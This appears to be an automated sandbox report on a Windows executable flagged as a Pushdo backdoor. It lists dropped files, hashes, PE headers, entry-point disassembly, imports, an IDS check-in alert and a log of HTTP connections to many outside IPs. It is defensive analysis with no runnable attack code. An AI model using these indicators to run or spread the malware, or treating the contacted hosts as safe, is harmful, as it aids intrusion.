                                                                                                                                                                              SSDEEP:24:EtPRDylU+9UzIva8oAt0VPLk3DxfaaNedYS+q9KCbBn+Ag4g5sFLcY:EtP5ylUBUvYAeKDxf0dY9vCb5Jzg5vY
                                                                                                                                                                              MD5:6B6AC8261122486E2DFBC275AA6A6DD6
                                                                                                                                                                              SHA1:265AFABB5EEC210D52A3176138EAABEE9D4BF42F
                                                                                                                                                                              SHA-256:D3B0728453A4D01810B843C937E8FB5A49A809D38BEEEA02F96916125AE7A24C
                                                                                                                                                                              SHA-512:7DE60EBB72AA5EC291D372C64C84F0B612B51F5846CA6F485B7A23E0E48EB6C3514978B1CB4012EF3F4E42914B493515FBD760216DBC709009402BF63F74BDF3
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:........................................MyDefaultKeyContainer.RSA1.................O...E.oe.`V...r3.wI_.-.T.<3x.).L..y]P.....|R.]..W.>.......y!z..>b...RO...].;d.'.wqX...........<r.$`*...G6.t6Vb.93B...R......................z..O............iM.g...\3.....,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... .....!.....}.L...h.....7..~8-qVC............. .....F%g..%M...F.+....0.....f.F....f/e..5d.3(..,.....w...k..>.s.H..B.T...&.b.p.P.o..(*.m....|H.<pUP0(..h......w....;..0..,Z..&.P.|..D.5{ .....-.z..qusOA..v.ar.^o.....A.....'h..;.E.&.q'@x...^...<..Z..@4A7.ta...p.a.. .......~c@...2L(.X/O..P.....}......a..J...T`..Rq..K?e..@...C.'%n._p...4h..\X..ZW;...U..W.\(...;.c[q.5...e....O...9.x.1.!.F...A....M}..s...L....m..s...o...|..._d+....y....eN....fX..BY`....zh.|.]..........]A..\x..oi...%15.W..a.t..GV.4...oW.sF......X......#7.......%.z.>_f.Gzuj.S...=^.l5..b.nJ.q....}..5...][#..7..|5...C.y......C36.<.R..9...ysM~W..}.p.2..HT..d`....`...i....sZ.F....2G
                                                                                                                                                                              Process:C:\Users\user\Desktop\OWd39WUX3D.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266240
                                                                                                                                                                              Entropy (8bit):7.103480092308883
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:gQOwTcGtqVEk9c/OkDpv/BjIQZmmmmmmm6RgtX:XgVEEELBjz9Ro
                                                                                                                                                                              MD5:DC6330AFF08812B5DBAF66CF0671CB20
                                                                                                                                                                              SHA1:12CE2B2BF8BCEB6862DB8AE9F8AF9E709844D051
                                                                                                                                                                              SHA-256:3F45F9A83B45320EA3D0350D7D4F221A3A575A42A8E6928AE6CC158FF41256B8
                                                                                                                                                                              SHA-512:A712DA08EF9795AB738E24906215FAE2E3D8EC75EDE37B1E80FFC411B050EF5B996598AF4F566F840CFB3D24E4C607A33617705C2F22F6FD741480AF8D1CFFB4
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..3.u.`.u.`.u.`.u.`.u.`.+.a.u.`.+.a.u.`.+.a.u.`..:`.u.`..8`~u.`..9`.u.`..`.u.`.u.`Xu.`.+.a.u.`.+4`.u.`.+.a.u.`Rich.u.`................PE..L......e.................D...................`....@..........................`............@..................................F..(....0.......................@.......<...............................<..@............`..,............................text....C.......D.................. ..`.rdata.......`.......H..............@..@.data...4....P.......6..............@....gfids....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Users\user\Desktop\OWd39WUX3D.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Entropy (8bit):7.103480092308883
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                              File name:OWd39WUX3D.exe
                                                                                                                                                                              File size:266'240 bytes
                                                                                                                                                                              MD5:dc6330aff08812b5dbaf66cf0671cb20
                                                                                                                                                                              SHA1:12ce2b2bf8bceb6862db8ae9f8af9e709844d051
                                                                                                                                                                              SHA256:3f45f9a83b45320ea3d0350d7d4f221a3a575a42a8e6928ae6cc158ff41256b8
                                                                                                                                                                              SHA512:a712da08ef9795ab738e24906215fae2e3d8ec75ede37b1e80ffc411b050ef5b996598af4f566f840cfb3d24e4c607a33617705c2f22f6fd741480af8d1cffb4
                                                                                                                                                                              SSDEEP:6144:gQOwTcGtqVEk9c/OkDpv/BjIQZmmmmmmm6RgtX:XgVEEELBjz9Ro
                                                                                                                                                                              TLSH:5D44E042F6E394F1D52648B140A6D732AA3A3E303B24CD3767C85F3DA9352819D75F2A
                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..3.u.`.u.`.u.`.u.`.u.`.+.a.u.`.+.a.u.`.+.a.u.`..:`.u.`..8`~u.`..9`.u.`...`.u.`.u.`Xu.`.+.a.u.`.+4`.u.`.+.a.u.`Rich.u.`.......
                                                                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                                                                              Entrypoint:0x40d40b
                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                                              Time Stamp:0x6502D0F5 [Thu Sep 14 09:23:01 2023 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                              File Version Major:6
                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                              Import Hash:684442765f785772af3613690dc75401
                                                                                                                                                                              Instruction
                                                                                                                                                                              call 00007FD140BEB581h
                                                                                                                                                                              jmp 00007FD140BEAB13h
                                                                                                                                                                              cmp ecx, dword ptr [004410A0h]
                                                                                                                                                                              jne 00007FD140BEAC85h
                                                                                                                                                                              ret
                                                                                                                                                                              jmp 00007FD140BEB134h
                                                                                                                                                                              push ebp
                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                              and dword ptr [004414A4h], 00000000h
                                                                                                                                                                              sub esp, 2Ch
                                                                                                                                                                              push ebx
                                                                                                                                                                              xor ebx, ebx
                                                                                                                                                                              inc ebx
                                                                                                                                                                              or dword ptr [004410A8h], ebx
                                                                                                                                                                              push 0000000Ah
                                                                                                                                                                              call 00007FD140BEC5F9h
                                                                                                                                                                              test eax, eax
                                                                                                                                                                              je 00007FD140BEADFDh
                                                                                                                                                                              and dword ptr [ebp-14h], 00000000h
                                                                                                                                                                              xor eax, eax
                                                                                                                                                                              or dword ptr [004410A8h], 02h
                                                                                                                                                                              xor ecx, ecx
                                                                                                                                                                              push esi
                                                                                                                                                                              push edi
                                                                                                                                                                              mov dword ptr [004414A4h], ebx
                                                                                                                                                                              lea edi, dword ptr [ebp-2Ch]
                                                                                                                                                                              push ebx
                                                                                                                                                                              cpuid
                                                                                                                                                                              mov esi, ebx
                                                                                                                                                                              pop ebx
                                                                                                                                                                              mov dword ptr [edi], eax
                                                                                                                                                                              mov dword ptr [edi+04h], esi
                                                                                                                                                                              mov dword ptr [edi+08h], ecx
                                                                                                                                                                              xor ecx, ecx
                                                                                                                                                                              mov dword ptr [edi+0Ch], edx
                                                                                                                                                                              mov eax, dword ptr [ebp-2Ch]
                                                                                                                                                                              mov edi, dword ptr [ebp-28h]
                                                                                                                                                                              mov dword ptr [ebp-0Ch], eax
                                                                                                                                                                              xor edi, 756E6547h
                                                                                                                                                                              mov eax, dword ptr [ebp-20h]
                                                                                                                                                                              xor eax, 49656E69h
                                                                                                                                                                              mov dword ptr [ebp-04h], eax
                                                                                                                                                                              mov eax, dword ptr [ebp-24h]
                                                                                                                                                                              xor eax, 6C65746Eh
                                                                                                                                                                              mov dword ptr [ebp-08h], eax
                                                                                                                                                                              xor eax, eax
                                                                                                                                                                              inc eax
                                                                                                                                                                              push ebx
                                                                                                                                                                              cpuid
                                                                                                                                                                              mov esi, ebx
                                                                                                                                                                              pop ebx
                                                                                                                                                                              or edi, dword ptr [ebp-04h]
                                                                                                                                                                              lea ebx, dword ptr [ebp-2Ch]
                                                                                                                                                                              or edi, dword ptr [ebp-08h]
                                                                                                                                                                              mov dword ptr [ebx], eax
                                                                                                                                                                              mov dword ptr [ebx+04h], esi
                                                                                                                                                                              mov dword ptr [ebx+08h], ecx
                                                                                                                                                                              mov dword ptr [ebx+0Ch], edx
                                                                                                                                                                              jne 00007FD140BEACC5h
                                                                                                                                                                              mov eax, dword ptr [ebp-2Ch]
                                                                                                                                                                              and eax, 0FFF3FF0h
                                                                                                                                                                              cmp eax, 000106C0h
                                                                                                                                                                              je 00007FD140BEACA5h
                                                                                                                                                                              cmp eax, 00020660h
                                                                                                                                                                              je 00007FD140BEAC9Eh
                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x346e40x28.rdata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x430000x1e0.rsrc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x440000x13a4.reloc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x33ca00x1c.rdata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x33cc00x40.rdata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x160000x12c.rdata
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                              .text0x10000x1431b0x14400False0.5834538966049383data6.660963770971366IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .rdata0x160000x1eda20x1ee00False0.760240068319838data6.776759102760025IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .data0x350000xcd340xc200False0.9127537048969072data7.546633459671217IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                              .gfids0x420000xac0x200False0.287109375data1.5063623528669496IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .rsrc0x430000x1e00x200False0.52734375data4.7074344725994175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                              .reloc0x440000x13a40x1400False0.8134765625data6.62963657771379IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                              RT_MANIFEST0x430600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                              DLLImport
                                                                                                                                                                              KERNEL32.dllEnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, GetProcessHeap, GetLastError, HeapWalk, DeleteCriticalSection, GetModuleFileNameA, GetModuleHandleA, CreateNamedPipeA, ConnectNamedPipe, ExitProcess, VirtualAlloc, CreateMutexA, ReleaseMutex, SetNamedPipeHandleState, GetSystemTime, DecodePointer, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, SetLastError, GetCurrentThreadId, RaiseException, HeapAlloc, HeapFree, GetModuleHandleW, GetProcAddress, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, FreeLibrary, LoadLibraryExW, LCMapStringW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetModuleHandleExW, GetStringTypeW, MultiByteToWideChar, WideCharToMultiByte, HeapSize, HeapReAlloc, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, InitializeSListHead, RtlUnwind, GetStdHandle, WriteFile, GetModuleFileNameW, CloseHandle, FindClose, FindFirstFileExW, FindNextFileW, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                              EnglishUnited States
                                                                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                              192.168.2.3104.21.23.949712802016867 09/15/23-07:26:04.055516TCP2016867ET TROJAN Backdoor.Win32.Pushdo.s Checkin4971280192.168.2.3104.21.23.9
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Sep 15, 2023 07:26:03.963746071 CEST4971080192.168.2.3137.118.26.67
                                                                                                                                                                              Sep 15, 2023 07:26:03.963932037 CEST4971180192.168.2.3192.124.249.20
                                                                                                                                                                              Sep 15, 2023 07:26:03.964940071 CEST4971280192.168.2.3104.21.23.9
                                                                                                                                                                              Sep 15, 2023 07:26:03.965429068 CEST4971380192.168.2.370.39.251.249
                                                                                                                                                                              Sep 15, 2023 07:26:03.965706110 CEST4971480192.168.2.3172.67.140.52
                                                                                                                                                                              Sep 15, 2023 07:26:03.966476917 CEST4971580192.168.2.354.161.222.85
                                                                                                                                                                              Sep 15, 2023 07:26:04.055114031 CEST8049712104.21.23.9192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.055236101 CEST4971280192.168.2.3104.21.23.9
                                                                                                                                                                              Sep 15, 2023 07:26:04.055516005 CEST4971280192.168.2.3104.21.23.9
                                                                                                                                                                              Sep 15, 2023 07:26:04.056639910 CEST8049714172.67.140.52192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.056710005 CEST4971480192.168.2.3172.67.140.52
                                                                                                                                                                              Sep 15, 2023 07:26:04.056961060 CEST4971480192.168.2.3172.67.140.52
                                                                                                                                                                              Sep 15, 2023 07:26:04.059979916 CEST8049711192.124.249.20192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.060039997 CEST4971180192.168.2.3192.124.249.20
                                                                                                                                                                              Sep 15, 2023 07:26:04.060249090 CEST4971180192.168.2.3192.124.249.20
                                                                                                                                                                              Sep 15, 2023 07:26:04.061403036 CEST804971370.39.251.249192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.061471939 CEST4971380192.168.2.370.39.251.249
                                                                                                                                                                              Sep 15, 2023 07:26:04.061650038 CEST4971380192.168.2.370.39.251.249
                                                                                                                                                                              Sep 15, 2023 07:26:04.063750982 CEST804971554.161.222.85192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.063805103 CEST4971580192.168.2.354.161.222.85
                                                                                                                                                                              Sep 15, 2023 07:26:04.064016104 CEST4971580192.168.2.354.161.222.85
                                                                                                                                                                              Sep 15, 2023 07:26:04.075347900 CEST4971680192.168.2.380.93.82.33
                                                                                                                                                                              Sep 15, 2023 07:26:04.107145071 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:04.145692110 CEST8049712104.21.23.9192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.147787094 CEST8049714172.67.140.52192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.152101994 CEST4971880192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:04.154485941 CEST8049712104.21.23.9192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.154676914 CEST4971280192.168.2.3104.21.23.9
                                                                                                                                                                              Sep 15, 2023 07:26:04.156428099 CEST8049711192.124.249.20192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.156817913 CEST8049711192.124.249.20192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.156867981 CEST4971180192.168.2.3192.124.249.20
                                                                                                                                                                              Sep 15, 2023 07:26:04.157298088 CEST804971370.39.251.249192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.160556078 CEST804971554.161.222.85192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.160604000 CEST4971580192.168.2.354.161.222.85
                                                                                                                                                                              Sep 15, 2023 07:26:04.160625935 CEST804971554.161.222.85192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.160679102 CEST4971580192.168.2.354.161.222.85
                                                                                                                                                                              Sep 15, 2023 07:26:04.175868988 CEST4971580192.168.2.354.161.222.85
                                                                                                                                                                              Sep 15, 2023 07:26:04.184398890 CEST804971370.39.251.249192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.184472084 CEST4971380192.168.2.370.39.251.249
                                                                                                                                                                              Sep 15, 2023 07:26:04.244200945 CEST804971680.93.82.33192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.244297028 CEST4971680192.168.2.380.93.82.33
                                                                                                                                                                              Sep 15, 2023 07:26:04.253860950 CEST4971180192.168.2.3192.124.249.20
                                                                                                                                                                              Sep 15, 2023 07:26:04.254407883 CEST4971680192.168.2.380.93.82.33
                                                                                                                                                                              Sep 15, 2023 07:26:04.254578114 CEST4971980192.168.2.354.161.222.85
                                                                                                                                                                              Sep 15, 2023 07:26:04.254946947 CEST4971380192.168.2.370.39.251.249
                                                                                                                                                                              Sep 15, 2023 07:26:04.272092104 CEST804971554.161.222.85192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.350637913 CEST8049711192.124.249.20192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.350699902 CEST4971180192.168.2.3192.124.249.20
                                                                                                                                                                              Sep 15, 2023 07:26:04.351344109 CEST804971370.39.251.249192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.351407051 CEST4971380192.168.2.370.39.251.249
                                                                                                                                                                              Sep 15, 2023 07:26:04.351579905 CEST804971954.161.222.85192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.351644993 CEST4971980192.168.2.354.161.222.85
                                                                                                                                                                              Sep 15, 2023 07:26:04.367830038 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.368019104 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:04.419624090 CEST804971859.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.419720888 CEST4971880192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:04.423692942 CEST804971680.93.82.33192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.423757076 CEST4971680192.168.2.380.93.82.33
                                                                                                                                                                              Sep 15, 2023 07:26:04.425359011 CEST4971980192.168.2.354.161.222.85
                                                                                                                                                                              Sep 15, 2023 07:26:04.425739050 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:04.483311892 CEST4971880192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:04.483828068 CEST4972080192.168.2.334.149.87.45
                                                                                                                                                                              Sep 15, 2023 07:26:04.485136032 CEST4971680192.168.2.380.93.82.33
                                                                                                                                                                              Sep 15, 2023 07:26:04.521959066 CEST804971954.161.222.85192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.522026062 CEST4971980192.168.2.354.161.222.85
                                                                                                                                                                              Sep 15, 2023 07:26:04.522052050 CEST804971954.161.222.85192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.522104979 CEST4971980192.168.2.354.161.222.85
                                                                                                                                                                              Sep 15, 2023 07:26:04.522497892 CEST4971980192.168.2.354.161.222.85
                                                                                                                                                                              Sep 15, 2023 07:26:04.574785948 CEST804972034.149.87.45192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.574872971 CEST4972080192.168.2.334.149.87.45
                                                                                                                                                                              Sep 15, 2023 07:26:04.578541994 CEST4972080192.168.2.334.149.87.45
                                                                                                                                                                              Sep 15, 2023 07:26:04.613522053 CEST4972180192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:04.618980885 CEST804971954.161.222.85192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.636435032 CEST4972280192.168.2.3142.251.41.51
                                                                                                                                                                              Sep 15, 2023 07:26:04.654331923 CEST804971680.93.82.33192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.654392004 CEST4971680192.168.2.380.93.82.33
                                                                                                                                                                              Sep 15, 2023 07:26:04.669377089 CEST804972034.149.87.45192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.686150074 CEST804972034.149.87.45192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.686223984 CEST4972080192.168.2.334.149.87.45
                                                                                                                                                                              Sep 15, 2023 07:26:04.686378002 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.687061071 CEST804971859.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.689599037 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.689618111 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.689661980 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.689753056 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.689779997 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:04.689779997 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:04.689780951 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:04.689831972 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.689851999 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.689852953 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:04.689871073 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.689879894 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:04.689901114 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:04.689919949 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:04.689922094 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.689975977 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:04.689996004 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.690032005 CEST8049717118.27.125.181192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.690042973 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:04.690074921 CEST4971780192.168.2.3118.27.125.181
                                                                                                                                                                              Sep 15, 2023 07:26:04.703768969 CEST8049721104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.703840971 CEST4972180192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:04.739451885 CEST4972180192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:04.741100073 CEST4972380192.168.2.33.140.13.188
                                                                                                                                                                              Sep 15, 2023 07:26:04.743453979 CEST8049722142.251.41.51192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.743518114 CEST4972280192.168.2.3142.251.41.51
                                                                                                                                                                              Sep 15, 2023 07:26:04.744323969 CEST4972280192.168.2.3142.251.41.51
                                                                                                                                                                              Sep 15, 2023 07:26:04.751693010 CEST804971859.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.751713991 CEST804971859.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.751732111 CEST804971859.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.751749039 CEST804971859.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.751768112 CEST804971859.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.751785040 CEST4971880192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:04.751785040 CEST4971880192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:04.751826048 CEST4971880192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:04.751826048 CEST4971880192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:04.751832008 CEST804971859.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.751852036 CEST804971859.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.751868963 CEST804971859.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.751882076 CEST4971880192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:04.751888037 CEST804971859.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.751902103 CEST4971880192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:04.751907110 CEST804971859.106.19.204192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.751929998 CEST4971880192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:04.751948118 CEST4971880192.168.2.359.106.19.204
                                                                                                                                                                              Sep 15, 2023 07:26:04.829860926 CEST8049721104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.839788914 CEST8049721104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.839859009 CEST8049721104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.839971066 CEST4972180192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:04.839971066 CEST4972180192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:04.839983940 CEST8049721104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.840054989 CEST8049721104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.840058088 CEST4972180192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:04.840109110 CEST4972180192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:04.840136051 CEST8049721104.26.7.221192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.840183020 CEST4972180192.168.2.3104.26.7.221
                                                                                                                                                                              Sep 15, 2023 07:26:04.847660065 CEST80497233.140.13.188192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:04.847851038 CEST4972380192.168.2.33.140.13.188
